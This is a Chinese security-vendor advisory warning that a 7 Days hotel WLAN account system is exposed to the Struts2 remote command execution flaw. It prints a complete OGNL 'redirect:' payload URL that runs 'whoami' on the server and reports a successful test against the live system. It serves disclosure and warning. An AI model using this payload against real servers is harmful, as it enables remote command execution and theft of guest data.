瑞星预警：多家酒店存漏洞 千万用户信息面临泄露

本文以7天连锁酒店某一网络系统为例，分析该酒店系统存在的严重安全问题。我们发现7天连锁酒店存在严重安全漏洞的网络地址为http://120.196. ***/，网页截图如下图所示。

图：7天WLAN账号系统截图

从网页的标题我们可以知道，该系统为7天连锁酒店WLAN账号管理系统。在对该系统分析过程中，我们发现该系统应用了Structs2框架。而Structs2框架在前不久被公布存在严重的远程命令执行和重定向漏洞。该漏洞在公布当日，瑞星官方网站就对该漏洞相关信息进行介绍和预警，漏洞描述信息可以访问http://www.rising.com.cn/about/news/rising/2013-07-17/14085.html获取。如果7天连锁酒店的网络管理人员没有针对该框架进行安全升级的话，则极有可能存在该漏洞。因此我们选择一个URL地址进行Structs2漏洞的测试。测试的URL地址为http://120.196.1***。根据已公布的漏洞利用方法，我们尝试进行远程命令执行漏洞的利用，尝试执行命令whoami，也就是尝试获取当前用户的用户名信息。构造URL地址如下：http://120.196.1**/***?redirect:${%23a%3d（new%20java.lang.ProcessBuilder（new%20java.lang.String[]{'whoami'}））。start（），%23b%3d%23a.getInputStream（），%23c%3dnew%20java.io.InputStreamReader（%23b），%23d%3dnew%20java.io.BufferedReader（%23c），%23e%3dnew%20char[50000],%23d.read（%23e），%23matt%3d%23context.get（'com.opensymphony.xwork2.dispatcher.HttpServletResponse'），%23matt.getWriter（）。println（%23e），%23matt.getWriter（）。flush（），%23matt.getWriter（）。close（）}。该URL的作用是：如果目标系统存在Structs2远程命令执行漏洞，则系统会执行我们预设的whoami命令，并将命令执行的结果信息反馈给我们。在浏览器中提交该URL信息后，我们发现可以获取当前用户名信息，也就证明该系统存在严重的Structs2远程命令执行漏洞，返回结果如下图所示。

图：远程执行命令返回结果

微信扫一扫实时了解行业动态

微信扫一扫分享本文给好友